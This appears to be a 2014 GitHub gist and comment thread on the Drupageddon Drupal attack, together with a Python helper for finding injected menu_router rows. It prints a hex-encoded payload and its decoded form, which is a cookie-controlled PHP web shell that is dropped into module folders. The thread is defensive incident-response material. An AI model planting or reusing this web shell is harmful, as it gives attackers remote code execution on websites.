Remote code execution attempt: will insert this binary data into the menu_router table: #drupalsa05

0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d

This attack will add file_put_contents() as the access_callback in your menu_router table.

Subsequently, that path is requested to attempt to drop more exploit code.

Look in menu router for file_put_contents and remove it if found.
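A triage helper for the check above, added here as an example rather than code from the gist or its commenters: given rows pulled from menu_router, it flags any row whose access_callback is a dangerous PHP function and decodes the serialized access_arguments by declared string length (the dropped PHP contains quotes and semicolons, so quote-scanning would break) to report which file the callback would write. The callbacks listed beyond file_put_contents are an assumed starting list, and the sample rows are constructed, reusing the path and file name from the variant in this thread with a harmless stand-in for the dropped PHP.

```python
import re

# file_put_contents is the callback seen in this thread; the rest are an assumed
# starting list of PHP functions that are equally dangerous as a menu_router callback.
SUSPICIOUS_CALLBACKS = {"file_put_contents", "assert", "eval", "system", "exec", "passthru"}

def php_unserialize_string_array(blob: str) -> list:
    """Parse the subset of PHP serialization these payloads use, a:N:{i:K;s:LEN:"...";...}.
    Strings are read by declared byte length, not by scanning for a closing quote,
    because the dropped PHP itself contains quotes and semicolons."""
    data = blob.encode("latin-1")
    head = re.match(rb"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a serialized PHP array")
    pos, items = head.end(), []
    for _ in range(int(head.group(1))):
        entry = re.match(rb'i:\d+;s:(\d+):"', data[pos:])
        if not entry:
            raise ValueError("unsupported element at offset %d" % pos)
        start = pos + entry.end()
        end = start + int(entry.group(1))
        if data[end:end + 2] != b'";':
            raise ValueError("declared string length does not match the data")
        items.append(data[start:end].decode("latin-1"))
        pos = end + 2
    if data[pos:pos + 1] != b"}":
        raise ValueError("trailing data after array")
    return items

def triage_menu_router(rows):
    """rows are (path, access_callback, access_arguments) tuples, e.g. from
    SELECT path, access_callback, access_arguments FROM menu_router;
    each finding names the file the callback would write so it can be removed."""
    findings = []
    for path, callback, args in rows:
        if callback in SUSPICIOUS_CALLBACKS:
            try:
                items = php_unserialize_string_array(args)
            except ValueError:
                items = []  # flag the row anyway; arguments could not be decoded
            findings.append({"path": path, "callback": callback,
                             "drops_file": items[0] if items else None,
                             "payload": items[1] if len(items) > 1 else None})
    return findings

# Constructed sample: the path and file name from the thread's variant, with a harmless
# stand-in for the dropped PHP, plus one legitimate row that must not be flagged.
SAMPLE_ROWS = [("cuyyct", "file_put_contents",
                'a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:22:"<?php echo "stand-in";";}'),
               ("admin/modules", "user_access", 'a:1:{i:0;s:18:"administer modules";}')]
```

Run triage_menu_router(SAMPLE_ROWS) against rows dumped from your own database; each finding's drops_file is the file to look for in the codebase, and the row itself should be removed from menu_router.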

Owner

joshkoenig commented Oct 16, 2014

Translates out to serialized PHP:

a:2:{i:0;s:23:"modules/syslog/rphb.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";}
Owner

joshkoenig commented Oct 16, 2014

Seems like it is designed to drop a menu_router callback, and then hit it at a later date with an exploit payload in the cookie.

This was a great heads up. I found a slight variant in one of my databases:

+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| path | load_functions | to_arg_functions | access_callback | access_arguments | page_callback | page_arguments | delivery_callback | fit | number_parts | context | tab_parent | tab_root | title | title_callback | title_arguments | theme_callback | theme_arguments | type | description | position | weight | include_file |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| cuyyct | | | file_put_contents | a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";} | | NULL | | 0 | 0 | 0 | | | | | | | | 0 | cuyyct | | 0 | NULL |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+

Owner

joshkoenig commented Oct 16, 2014

Looks like this is trying to drop different files depending on how it's constructed. You should see if there's a modules/trigger/eygo.php file in your codebase.

Owner

joshkoenig commented Oct 16, 2014

Also, update your site! :)

There was a file in the codebase. I found the file when I tried to git pull my Drupal update and git complained of this file. Sites updated. Scary one though!

tamerzg commented Oct 18, 2014

It seems that the file has a random name and randomly gets inserted into one of the module subdirectories, as I have seen it in different directories on a couple of my sites.
More info on how to find it and delete it: http://www.zoubi.me/blog/drupageddon-updating-drupal-732-not-enough-your-site-may-already-be-hacked
